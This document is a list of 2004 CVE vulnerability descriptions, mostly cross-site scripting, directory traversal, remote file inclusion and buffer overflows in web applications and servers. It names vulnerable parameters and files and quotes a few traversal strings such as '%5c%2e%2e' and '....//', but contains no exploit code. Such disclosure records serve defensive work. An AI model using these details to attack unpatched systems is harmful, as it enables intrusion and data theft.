[CVE-2004-2127] Directory traversal vulnerability in Web Blog 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the file variable.
[CVE-2004-2123] Multiple cross-site scripting (XSS) vulnerabilities in Nextplace.com E-Commerce ASP Engine allow remote attackers to inject arbitrary web script or HTML via the (1) level parameter of productdetail.asp, (2) searchKey parameter of searchresults.asp, and possibly (3) level parameter of ListCategories.asp.
[CVE-2004-2122] Cross-site scripting (XSS) vulnerability in intraforum_db.cgi in Intra Forum allows remote attackers to inject arbitrary web script or HTML via the (1) use_last_read or (2) forum parameters.
[CVE-2004-2121] Multiple directory traversal vulnerabilities in Borland Web Server (BWS) 1.0b3 and earlier allow remote attackers to read and download arbitrary files via (1) multi-dot "......" sequences, or (2) "%5c%2e%2e" (encoded "\..") sequences, in the URL.
[CVE-2004-2120] Reptile Web Server allows remote attackers to cause a denial of service (CPU consumption) via multiple incomplete GET requests without the HTTP version.
[CVE-2004-2119] Cross-site scripting (XSS) vulnerability in Tiny Server 1.1 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2004-2113] Cross-site scripting (XSS) vulnerability in BremsServer 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2004-2106] Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to list directories via a direct request to (1) /com/, (2) /com/novell/, (3) /com/novell/webaccess, or (4) /ns-icons/.
[CVE-2004-2105] The webacc servlet in Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to read arbitrary .htt files via a full pathname in the error parameter.
[CVE-2004-2104] Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to obtain sensitive server information, including the internal IP address, via a direct request to (1) snoop.jsp, (2) SnoopServlet, (3) env.bas, or (4) lcgitest.nlm.
[CVE-2004-2103] Cross-site scripting (XSS) vulnerability in Novell NetWare Enterprise Web Server 5.1 and 6.0 allows remote attackers to process arbitrary script or HTML as other users via (1) a malformed request for a Perl program with script in the filename, (2) the User.id parameter to the webacc servlet, (3) the GWAP.version parameter to webacc, or (4) a URL request for a .bas file with script in the filename.
[CVE-2004-2102] Cross-site scripting (XSS) vulnerability in FREESCO 2.05, a modified version of thttpd, allows remote attackers to inject arbitrary web script or HTML via the test parameter.
[CVE-2004-2094] Cross-site scripting (XSS) vulnerability in WebcamXP 1.06.945 allows remote attackers to inject arbitrary HTML or web script as other users via a URL that contains the script.
[CVE-2004-2085] Multiple cross-site scripting (XSS) vulnerabilities in Brad Fears phpCodeCabinet 0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via multiple parameters, including (1) the sid parameter to comments.php, (2) the cid, cf, or rfd parameters to category.php, or the cid parameter to (3) input.php, (4) browse.php, (5) themes/facade/header.php, or (6) themes/phpcc/header.php.
[CVE-2004-2084] Cross-site scripting (XSS) vulnerability in search.php in JShop E-Commerce Server allows remote attackers to inject arbitrary web script or HTML via the xSearch parameter.
[CVE-2004-2083] Opera Web Browser 7.0 through 7.23 allows remote attackers to trick users into executing a malicious file by embedding a CLSID in the file name, which causes the malicious file to appear as a trusted file type, aka "File Download Extension Spoofing."
[CVE-2004-2076] Cross-site scripting (XSS) vulnerability in search.php for Jelsoft vBulletin 3.0.0 RC4 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2004-2064] Cross-site scripting (XSS) vulnerability in lostBook 1.1 and earlier allows remote attackers to inject arbitrary web script via the (1) Email or (2) Website fields.
[CVE-2004-2063] Cross-site scripting (XSS) vulnerability in antiboard.php in AntiBoard 0.7.2 and earlier allows remote attackers to inject arbitrary HTML or web script via the feedback parameter.
[CVE-2004-2060] ASPRunner 2.4 stores the database under the web root in the db directory, which may allow remote attackers to obtain the database via a direct request to the database filename, which is predictable based on table and field names.
[CVE-2004-2059] Multiple cross-site scripting vulnerabilities in ASPRunner 2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) SearchFor parameter in [TABLE-NAME]_search.asp, (2) SQL parameter in [TABLE-NAME]_edit.asp, (3) SearchFor parameter in [TABLE]_list.asp, or (4) SQL parameter in export.asp.
[CVE-2004-2055] Cross-site scripting (XSS) vulnerability in search.php for PhpBB 2.0.4 and 2.0.9 allows remote attackers to inject arbitrary HTML or web script via the search_author parameter.
[CVE-2004-2047] Directory traversal vulnerability in EasyWeb FileManager 1.0 RC-1 for PostNuke allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the pathext parameter.
[CVE-2004-2045] The HTTP administration interface on Conceptronic CADSLR1 ADSL router running firmware 3.04n allows remote attackers to cause a denial of service (device reboot) via an HTTP request with a long username.
[CVE-2004-2041] PHP remote file inclusion vulnerability in secure_img_render.php in e107 0.615 allows remote attackers to execute arbitrary PHP code by modifying the p parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-2040] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.615 allow remote attackers to inject arbitrary web script or HTML via the (1) LAN_407 parameter to clock_menu.php, (2) "email article to a friend" field, (3) "submit news" field, or (4) avmsg parameter to usersettings.php.
[CVE-2004-2038] Cross-site scripting (XSS) vulnerability in Land Down Under (LDU) before LDU 700 allows remote attackers to inject arbitrary web script or HTML via a BBcode img tag in (1) functions.php, (2) header.php or (3) auth.inc.php.
[CVE-2004-2034] Buffer overflow in the (1) WTHoster and (2) WebDriver modules in WildTangent Web Driver 4.0 allows remote attackers to execute arbitrary code via a long filename.
[CVE-2004-2031] Cross-site scripting (XSS) vulnerability in user.php in e107 allows remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) MSN, or (3) AIM fields.
[CVE-2004-2030] Multiple cross-site scripting (XSS) vulnerabilities in index.jsp for Liferay before 2.2.0 release 10/1/2004 allow remote attackers to inject arbitrary web script or HTML, as demonstrated using the message subject.
[CVE-2004-2028] Cross-site scripting (XSS) vulnerability in stats.php in e107 allows remote attackers to inject arbitrary web script or HTML via the referer parameter to log.php.
[CVE-2004-2020] Multiple cross-site scripting (XSS) vulnerabilities in Php-Nuke 6.x through 7.3 allow remote attackers to inject arbitrary HTML or web script into the (1) optionbox parameter in the News module, (2) date parameter in the Statistics module, (3) year, month, and month_1 parameters in the Stories_Archive module, (4) mode, order, and thold parameters in the Surveys module, or (5) a SQL statement to index.php, as processed by mainfile.php.
[CVE-2004-2019] The WebLinks module in Php-Nuke 6.x through 7.3 allows remote attackers to obtain sensitive information via an invalid show parameter, which displays the full path in a PHP error message.
[CVE-2004-2018] PHP remote file inclusion vulnerability in index.php in Php-Nuke 6.x through 7.3 allows remote attackers to execute arbitrary PHP code by modifying the modpath parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-2017] Multiple cross-site scripting (XSS) vulnerabilities in Turbo Traffic Trader C (TTT-C) 1.0 allow remote attackers to inject arbitrary HTML or web script, as demonstrated via (1) the link parameter to ttt-out, (2) the X-Forwarded-For header in a GET request to ttt-in, (3) the Referer header in a GET request to ttt-in, or the (4) site name or (5) site URL fields in the main control panel.
[CVE-2004-2015] Cross-site scripting (XSS) vulnerability in WebCT Campus Edition allows remote attackers to inject arbitrary HTML or web script via (1) iframe, (2) img, or (3) object tags.
[CVE-2004-2010] PHP remote file inclusion vulnerability in index.php in phpShop 0.7.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the base_dir parameter to reference a URL on a remote web server that contains phpshop.cfg.
[CVE-2004-2007] Cross-site scripting (XSS) vulnerability in modules.php in NukeJokes 1.7 and 2 Beta allows remote attackers to inject arbitrary HTML or web script via the (1) cat parameter in a CatView function or (2) jokeid parameter in a JokeView function.
[CVE-2004-1999] Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script via the (1) ttitle or (2) sid parameters to modules.php.
[CVE-2004-1996] Cross-site scripting (XSS) vulnerability in Simple Machines Forum (SMF) 1.0 allows remote attackers to inject arbitrary web script via the size tag.
[CVE-2004-1993] The patch to the checklogin function in omail.pl for omail webmail 0.98.5 is incomplete, which allows remote attackers to execute arbitrary commands via shell metacharacters such as "`" (backticks) in the password.
[CVE-2004-1991] Directory traversal vulnerability in Aldo's Web Server (aweb) 1.5 allows remote attackers to view arbitrary files via a .. (dot dot) in an HTTP GET request.
[CVE-2004-1990] Aldo's Web Server (aweb) 1.5 allows remote attackers to gain sensitive information via an arbitrary character, which reveals the full path and the user running the aweb process, possibly due to a malformed request.
[CVE-2004-1989] PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc.
[CVE-2004-1988] PHP remote file inclusion vulnerability in init.inc.php in Coppermine Photo Gallery 1.2.0 RC4 allows remote attackers to execute arbitrary PHP code by modifying the CPG_M_DIR to reference a URL on a remote web server that contains functions.inc.php.
[CVE-2004-1985] Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via the CPG_URL parameter.
[CVE-2004-1979] Cross-site scripting (XSS) vulnerability in do_search.php in PROPS 0.6.1 allows remote attackers to inject arbitrary HTML or web script via the search_string parameter.
[CVE-2004-1978] Cross-site scripting (XSS) vulnerability in help.php in Moodle before 1.3 allows remote attackers to inject arbitrary HTML and web script via the text parameter.
[CVE-2004-1975] Cross-site scripting (XSS) vulnerability in the category module in pafiledb.php for paFileDB 3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a vulnerability that is closely related to CVE-2004-1551.
[CVE-2004-1973] DiGi Web Server allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request that contains a large number of / (slash) characters, which consumes resources when DiGi converts the slashes to \ (backslash) characters.
[CVE-2004-1965] Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php, (3) TID parameter to post.php, or (4) redirect parameter to index.php.
[CVE-2004-1964] Cross-site scripting (XSS) vulnerability in nqt.php in Network Query Tool (NQT) 1.6 allows remote attackers to inject arbitrary web script or HTML via the portNum parameter.
[CVE-2004-1960] Cross-site scripting (XSS) vulnerability in blocker_query.php in Protector System 1.15b1 allows remote attackers to inject arbitrary web script or HTML via the (1) target or (2) portNum parameters.
[CVE-2004-1957] Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.726 allow remote attackers to inject arbitrary web script or HTML via the (1) lid and query parameters to the Downloads module, (2) query parameter to the Web_links module, or (3) hlpfile parameter to openwindow.php.
[CVE-2004-1956] PostNuke 0.7.2.6 allows remote attackers to gain information via a direct HTTP request to files in the (1) includes/blocks directory, (2) pnadodb directory, (3) NS-NewUser module, (4) NS-Your_Account, (5) NS-LostPassword module, or (6) NS-User module, which reveals the path to the web server in a PHP error message.
[CVE-2004-1954] Cross-site scripting (XSS) vulnerability in modules.php in phProfession 2.5 allows remote attackers to inject arbitrary web script or HTML via the jcode parameter.
[CVE-2004-1946] Format string vulnerability in the PRINT_ERROR function in common.c for Cherokee Web Server 0.4.16 and earlier allows local users to execute arbitrary code via format string specifiers in the -C command line argument. NOTE: it is not clear whether this issue could be exploited remotely, or if Cherokee is running at escalated privileges. Therefore it might not be a vulnerability.
[CVE-2004-1941] Fastream NETFile FTP/Web Server 6.5.1.980 allows remote attackers to cause a denial of service via a username that does not exist.
[CVE-2004-1939] Cross-site scripting (XSS) vulnerability in Zaep AntiSpam 2.0 allows remote attackers to inject arbitrary web script or HTML via double encoded slashes (%252F) in the key parameter.
[CVE-2004-1935] Cross-site scripting (XSS) vulnerability in SCT Campus Pipeline allows remote attackers to inject arbitrary web script or HTML via onload, onmouseover, and other Javascript events in an e-mail attachment.
[CVE-2004-1930] Cross-site scripting (XSS) vulnerability in the cookiedecode function in mainfile.php for PHP-Nuke 6.x through 7.2, when themes are used, allows remote attackers to inject arbitrary web script or HTML via a base64-encoded user parameter or cookie.
[CVE-2004-1924] Multiple cross-site scripting (XSS) vulnerabilities in Tiki CMS/Groupware (TikiWiki) 1.8.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) theme parameter to tiki-switch_theme.php, (2) find and priority parameters to messu-mailbox.php, (3) flag, priority, flagval, sort_mode, or find parameters to messu-read.php, (4) articleId parameter to tiki-read_article.php, (5) parentId parameter to tiki-browse_categories.php, (6) comments_threshold parameter to tiki-index.php, (7) articleId parameter to tiki-print_article.php, (8) galleryId parameter to tiki-list_file_gallery.php, (9) galleryId parameter to tiki-upload_file.php, (10) faqId parameter to tiki-view_faq.php, (11) chartId parameter to tiki-view_chart.php, or (12) surveyId parameter to tiki-survey_stats_survey.php.
[CVE-2004-1923] Tiki CMS/Groupware (TikiWiki) 1.8.1 and earlier allows remote attackers to gain sensitive information via a direct request to (1) banner_click.php, (2) categorize.php, (3) tiki-admin_include_directory.php, or (4) tiki-directory_search.php, which reveal the web server path in an error message.
[CVE-2004-1913] Cross-site scripting (XSS) vulnerability in modules.php in NukeCalendar 1.1.a, as used in PHP-Nuke, allows remote attackers to inject arbitrary web script or HTML via the eid parameter.
[CVE-2004-1911] Cross-site scripting (XSS) vulnerability in AzDGDatingLite 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) l parameter (aka language variable) to index.php or (2) id parameter to view.php.
[CVE-2004-1907] The Web Filtering functionality in Kerio Personal Firewall (KPF) 4.0.13 allows remote attackers to cause a denial of service (crash) by sending hex-encoded URLs containing "%13%12%13".
[CVE-2004-1899] The administration interface in Monit 1.4 through 4.2 allows remote attackers to cause an off-by-one overflow via a POST that contains 1024 bytes.
[CVE-2004-1898] Stack-based buffer overflow in the administration interface in Monit 1.4 through 4.2 allows remote attackers to execute arbitrary code via a long username.
[CVE-2004-1897] Administration interface in Monit 1.4 through 4.2 allows remote attackers to cause a denial of service (segmentation fault) by sending a Basic Authentication request without a password, which causes Monit to decrement a null pointer and perform an out-of-bounds read.
[CVE-2004-1893] Dreamweaver MX, when "Using Driver On Testing Server" or "Using DSN on Testing Server" is selected, uploads the mmhttpdb.asp script to the web site but does not require authentication, which allows remote attackers to obtain sensitive information and possibly execute arbitrary SQL commands via a direct request to mmhttpdb.asp.
[CVE-2004-1892] Stack-based buffer overflow in DecodeBase16 function, as used in the (1) IRC module and (2) web server in eMule 0.42d, allows remote attackers to execute arbitrary code via a long string.
[CVE-2004-1888] display.cgi in Aborior Encore WebForum allows remote attackers to execute arbitrary commands via shell metacharacters in the file variable.
[CVE-2004-1882] Cross-site scripting (XSS) vulnerability in popuplargeimage.asp in CactuShop 5.x allows remote attackers to inject arbitrary web script or HTML via the strImageTag parameter.
[CVE-2004-1879] Cross-site scripting (XSS) vulnerability in PHPKIT 1.6.03 allows remote attackers to inject arbitrary web script or HTML via forum messages.
[CVE-2004-1875] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 9.1.0-R85 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to testfile.html, (2) file parameter to erredit.html, (3) dns parameter to dnslook.html, (4) account parameter to ignorelist.html, (5) account parameter to showlog.html, (6) db parameter to repairdb.html, (7) login parameter to doaddftp.html, (8) account parameter to editmsg.htm, or (9) ip parameter to del.html. NOTE: the dnslook.html vector was later reported to exist in cPanel 10.
[CVE-2004-1874] Multiple cross-site scripting (XSS) vulnerabilities in (1) deliver.asp and (2) billing.asp in A-CART Pro and A-CART 2.0 allow remote attackers to inject arbitrary web script or HTML via the user information forms.
[CVE-2004-1872] Cross-site scripting (XSS) vulnerability in WebCT Campus Edition 4.1.1.5 allows remote attackers to inject arbitrary web script or HTML via the @import URL function in a CSS style tag.
[CVE-2004-1871] Multiple cross-site scripting (XSS) vulnerabilities in PhotoPost PHP Pro 4.6.x and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ppuser, (2) password, (3) stype, (4) perpage, (5) sort, (6) page, (7) si, or (8) cat parameters to showmembers.php, or the (9) photo name, (10) photo description, (11) album name, or (12) album description fields.
[CVE-2004-1867] Cross-site scripting (XSS) vulnerability in guest.cgi in Fresh Guest Book allows remote attackers to inject arbitrary web script or HTML via the Name field.
[CVE-2004-1865] Cross-site scripting (XSS) vulnerability in the administration panel in bBlog 0.7.2 allows remote authenticated users with superuser privileges to inject arbitrary web script or HTML via a blog name ($blogname). NOTE: if administrators are normally allowed to add HTML by other means, e.g. through Smarty templates, then this issue would not give any additional privileges, and thus would not be considered a vulnerability.
[CVE-2004-1863] Multiple cross-site scripting (XSS) vulnerabilities in XMB (aka extreme message board) 1.9 beta (aka Nexus beta) allow remote attackers to inject arbitrary web script or HTML via (1) the u2uheader parameter in editprofile.php, the restrict parameter in (2) member.php, (3) misc.php, and (4) today.php, and (5) an arbitrary parameter in phpinfo.php.
[CVE-2004-1862] Multiple cross-site scripting (XSS) vulnerabilities in Extreme Messageboard (XMB) 1.8 SP3 and 1.9 beta allow remote attackers to inject arbitrary web script or HTML via the (1) xmbuser parameter to xmb.php, (2) folder parameter to u2u.php, (3) viewmost, replymost, or latest parameter to stats.php, (4) message or icons parameter to post.php, (5) threadlist, pagelinks, forumlist, navigation, or (6) forumdisplay parameter to forumdisplay.php.
[CVE-2004-1859] Directory traversal vulnerability in Trend Micro Interscan Web Viruswall in InterScan VirusWall 3.5x allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2004-1858] HP Web Jetadmin 7.5.2546 allows remote attackers to cause a denial of service (crash) via a malformed request, possibly due to a stricmp() error from an invalid use of the "$" character.
[CVE-2004-1857] Directory traversal vulnerability in setinfo.hts in HP Web Jetadmin 7.5.2546 allows remote authenticated attackers to read arbitrary files via a .. (dot dot) in the setinclude parameter.
[CVE-2004-1856] devices_update_printer_fw_upload.hts in HP Web JetAdmin 7.5.2546, when no password is set, allows remote attackers to upload arbitrary files to the printer directory.
[CVE-2004-1849] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 9.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to dodelautores.html or (2) handle parameter to addhandle.html.
[CVE-2004-1845] Multiple cross-site scripting (XSS) vulnerabilities in News Manager Lite 2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to comment_add.asp, (2) search parameter to search.asp, or (3) n parameter to category_news_headline.asp.
[CVE-2004-1844] Cross-site scripting (XSS) vulnerability in Member Management System 2.1 allows remote attackers to inject arbitrary web script or HTML via (1) the err parameter to error.asp or (2) register.asp.
[CVE-2004-1840] Multiple cross-site scripting (XSS) vulnerabilities in MS Analysis module 2.0 for PHP-Nuke allow remote attackers to inject arbitrary web script or HTML via the (1) screen parameter to modules.php, (2) module_name parameter to title.php, (3) sortby parameter to modules.php, or (4) overview parameter to modules.php.
[CVE-2004-1838] Directory traversal vulnerability in xweb 1.0 allows remote attackers to download arbitrary files via a .. (dot dot) in the URL.
[CVE-2004-1837] Cross-site scripting (XSS) vulnerability in Mod_survey 3.0.x before 3.0.16-pre2 and 3.2.x before 3.2.0-pre4 allows remote attackers to inject arbitrary web script or HTML via certain survey fields or error messages for malformed query strings.
[CVE-2004-1829] Multiple cross-site scripting (XSS) vulnerabilities in error.php in Gijza.net Error Manager 2.1 for PHP-Nuke 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) pagetitle or (2) error parameters, or (3) certain parameters in the error log.
[CVE-2004-1827] Cross-site scripting (XSS) vulnerability in YaBB 1 Gold(SP1.3) and YaBB SE 1.5.1 Final allows remote attackers to inject arbitrary web script via the background:url property in (1) glow or (2) shadow tags.
[CVE-2004-1825] Cross-site scripting (XSS) vulnerability in index.php in Mambo Open Source 4.5 stable 1.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) return or (2) mos_change_template parameters.
[CVE-2004-1824] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.0 allows remote attackers to inject arbitrary web script or HTML via the what parameter to memberlist.php.
[CVE-2004-1823] Multiple cross-site scripting (XSS) vulnerabilities in Jelsoft vBulletin 2.0 beta 3 through 3.0 can4 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to showthread.php or (2) order parameter to forumdisplay.php.
[CVE-2004-1822] Multiple cross-site scripting (XSS) vulnerabilities in Phorum 3.1 through 5.0.3 beta allow remote attackers to inject arbitrary web script or HTML via the (1) HTTP_REFERER parameter to login.php, (2) HTTP_REFERER parameter to register.php, or (3) target parameter to profile.php.
[CVE-2004-1820] PHP remote file inclusion vulnerability in displaycategory.php in 4nalbum 0.92 for PHP-Nuke 6.5 through 7.0 allows remote attackers to execute arbitrary PHP code by modifying the basepath parameter to reference a URL on a remote web server that contains fileFunctions.php.
[CVE-2004-1817] Cross-site scripting (XSS) vulnerability in modules.php in Php-Nuke 7.1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) Your Name field, (2) e-mail field, (3) nicname field, (4) fname parameter, (5) ratenum parameter, or (6) search field.
[CVE-2004-1816] Unknown vulnerability in Sun Java System Application Server 7.0 Update 2 and earlier, when a SOAP web service expects an array of objects as an argument, allows remote attackers to cause a denial of service (memory consumption).
[CVE-2004-1815] Unknown vulnerability in ColdFusion MX 6.0 and 6.1, and JRun 4.0, when a SOAP web service expects an array of objects as an argument, allows remote attackers to cause a denial of service (memory consumption).
[CVE-2004-1811] The SSL HTTP Server in HP Web-enabled Management Software 5.0 through 5.92, with anonymous access enabled, allows remote attackers to compromise the trusted certificates by uploading their own certificates.
[CVE-2004-1809] Cross-site scripting (XSS) vulnerability in phpBB 2.0.6d and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) postdays parameter to viewtopic.php or (2) topicdays parameter to viewforum.php.
[CVE-2004-1807] Cross-site scripting (XSS) vulnerability in index.cfm in CFWebstore 5.0 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2004-1806] SQL injection vulnerability in index.cfm in CFWebstore 5.0 allows remote attackers to execute SQL commands via the (1) category_id, (2) product_id, or (3) feature_id parameters.
[CVE-2004-1802] Chat Anywhere 2.72 and earlier allows remote attackers to hide their IP address by using %00 before the nickname, which causes the IP address to be displayed as $IP$ on the administration web page.
[CVE-2004-1801] Directory traversal vulnerability in PWebServer 0.3.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2004-1799] PF in certain OpenBSD versions, when stateful filtering is enabled, does not limit packets for a session to the original interface, which allows remote attackers to bypass intended packet filters via spoofed packets to other interfaces.
[CVE-2004-1797] Cross-site scripting (XSS) vulnerability in search.php for FreznoShop 1.3.0 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2004-1794] Cross-site scripting (XSS) vulnerability in the VCard4J Toolkit allows remote attackers to inject arbitrary web script or HTML via the NICKNAME tag in a vCard.
[CVE-2004-1788] ASP-Nuke 1.3 and earlier places user credentials under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to main.mdb.
[CVE-2004-1786] PortalApp places user credentials under the web root with insufficient access control, which allows remote attackers to gain access to sensitive information via a direct request to 8275.mdb.
[CVE-2004-1784] Buffer overflow in the web server of Webcam Watchdog 3.63 allows remote attackers to execute arbitrary code via a long HTTP GET request.
[CVE-2004-1782] athenareg.php in Athena Web Registration allows remote attackers to execute arbitrary commands via shell metacharacters in the pass parameter.
[CVE-2004-1779] Cross-site scripting (XSS) vulnerability in board.php for ThWboard before beta 2.84 allows remote attackers to inject arbitrary web script or HTML via the lastvisited parameter.
[CVE-2004-1776] Cisco IOS 12.1(3) and 12.1(3)T allows remote attackers to read and modify device configuration data via the cable-docsis read-write community string used by the Data Over Cable Service Interface Specification (DOCSIS) standard.
[CVE-2004-1758] BEA WebLogic Server and WebLogic Express version 8.1 up to SP2, 7.0 up to SP4, and 6.1 up to SP6 may store the database username and password for an untargeted JDBC connection pool in plaintext in config.xml, which allows local users to gain privileges.
[CVE-2004-1757] BEA WebLogic Server and Express 8.1, SP1 and earlier, stores the administrator password in cleartext in config.xml, which allows local users to gain privileges.
[CVE-2004-1756] BEA WebLogic Server and WebLogic Express 8.1 SP2 and earlier, and 7.0 SP4 and earlier, when using 2-way SSL with a custom trust manager, may accept a certificate chain even if the trust manager rejects it, which allows remote attackers to spoof other users or servers.
[CVE-2004-1755] The Web Services fat client for BEA WebLogic Server and Express 7.0 SP4 and earlier, when using 2-way SSL and multiple certificates to connect to the same URL, may use the incorrect identity after the first connection, which could allow users to gain privileges.
[CVE-2004-1747] Cross-site scripting (XSS) vulnerability in NetworkEverywhere NR041 running firmware 1.2 Release 03 allows remote attackers to inject arbitrary web script or HTML via the DHCP HOSTNAME option.
[CVE-2004-1746] Cross-site scripting (XSS) vulnerability in index.php in PHP Code Snippet Library allows remote attackers to inject arbitrary web script or HTML via the (1) cat_select or (2) show parameters.
[CVE-2004-1744] Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to cause a denial of service (CPU consumption or crash) via many large HTTP requests.
[CVE-2004-1743] Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to view arbitrary files via an HTTP request for the disk_c virtual folder.
[CVE-2004-1742] Directory traversal vulnerability in WebAPP 0.9.9 allows remote attackers to view arbitrary files via a .. (dot dot) in the viewcat parameter.
[CVE-2004-1738] Cross-site scripting (XSS) vulnerability in page.php in JShop allows remote attackers to inject arbitrary web script or HTML via the xPage parameter.
[CVE-2004-1735] Cross-site scripting (XSS) vulnerability in the create list option in Sympa 4.1.x and earlier allows remote authenticated users to inject arbitrary web script or HTML via the description field.
[CVE-2004-1734] PHP remote file inclusion vulnerability in Mantis 0.19.0a allows remote attackers to execute arbitrary PHP code by modifying the (1) t_core_path parameter to bug_api.php or (2) t_core_dir parameter to relationship_api.php to reference a URL on a remote web server that contains the code.
[CVE-2004-1730] Cross-site scripting (XSS) vulnerability in Mantis bugtracker allows remote attackers to inject arbitrary web script or HTML via (1) the return parameter to login_page.php, (2) e-mail field in signup.php, (3) action parameter to login_select_proj_page.php, or (4) hide_status parameter to view_all_set.php.
[CVE-2004-1729] Cross-site scripting (XSS) vulnerability in Nihuo Web Log Analyzer 1.6 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2004-1720] The (1) address.html and possibly (2) calendar.html pages in Merak Mail Server 5.2.7 allow remote attackers to gain sensitive information via an invalid HTTP request, which reveals the installation path. NOTE: it is unclear whether the calendar.html is an exposure, since the path is leaked in web logs that may only be available to the administrators, who would have access to the path through legitimate means.
[CVE-2004-1719] Multiple cross-site scripting (XSS) vulnerabilities in Merak Webmail Server 5.2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, or (6) showlite parameters to address.html, the (7) spage or (8) autoresponder parameters to settings.html, the (9) folder parameter to readmail.html, the (10) attachmentpage_text_error parameter to attachment.html, the (11) folder, (12) ct, or (13) cv parameters to calendar.html, (14) an <img> tag, or (15) the subject of an e-mail message.
[CVE-2004-1716] Cross-site scripting (XSS) vulnerability in PForum before 1.26 allows remote attackers to inject arbitrary web script or HTML via the (1) IRC Server or (2) AIM ID fields in the user profile.
[CVE-2004-1715] Directory traversal vulnerability in MIMEsweeper for Web before 5.0.4 allows remote attackers or local users to read arbitrary files via "..\\", "..\", and similar dot dot sequences in the URL.
[CVE-2004-1711] Cross-site scripting (XSS) vulnerability in post.php in Moodle before 1.3 allows remote attackers to inject arbitrary web script or HTML via the reply parameter.
[CVE-2004-1708] Webbsyte Chat 0.9.0 allows remote attackers to cause a denial of service (crash) via a large number of connections.
[CVE-2004-1700] Cross-site scripting (XSS) vulnerability in SettingsBase.php in Pinnacle ShowCenter 1.51 build 121 allows remote attackers to inject arbitrary HTML or web script via the Skin parameter, which is echoed in an error message.
[CVE-2004-1693] PHP remote file inclusion vulnerability in Function.php in Mambo 4.5 (1.0.9) allows remote attackers to execute arbitrary PHP code by modifying the mosConfig_absolute_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-1692] Cross-site scripting (XSS) vulnerability in index.php in Mambo 4.5 (1.0.9) allows remote attackers to inject arbitrary web script or HTML via the (1) Itemid, (2) mosmsg, or (3) limit parameters.
[CVE-2004-1691] The Web Server in DNS4Me 3.0.0.4 allows remote attackers to cause a denial of service (CPU consumption and crash) via a large amount of data.
[CVE-2004-1690] Cross-site scripting (XSS) vulnerability in the Web Server in DNS4Me 3.0.0.4 allows remote attackers to execute arbitrary web script or HTML via the URL.
[CVE-2004-1674] viewaction.html in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to (1) delete arbitrary files via the originalfolder parameter or (2) move arbitrary files via the messageid parameter.
[CVE-2004-1673] accountsettings_add.html in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to create text files with arbitrary content via the accountid parameter.
[CVE-2004-1672] attachment.html in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to view other users' attachments by specifying the username and message ID in an HTTP request.
[CVE-2004-1671] Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to gain sensitive information via a direct request to (1) accountsettings_add.html or (2) topmenu.html.
[CVE-2004-1670] Multiple directory traversal vulnerabilities in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7, and possibly other versions, allow remote attackers to (1) create arbitrary directories via a .. (dot dot) in the user parameter to viewaction.html or (2) rename arbitrary files via a ....// (doubled dot dot) in the folderold or folder parameters to folders.html.
[CVE-2004-1669] Cross-site scripting (XSS) vulnerability in MERAK Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to execute arbitrary web script or HTML via the (1) User name parameter to accountsettings.html or (2) Search string parameter to search.html.
[CVE-2004-1665] Cross-site scripting (XSS) vulnerability in index.php in PsNews 1.1 allows remote attackers to inject arbitrary web script or HTML via the no parameter.
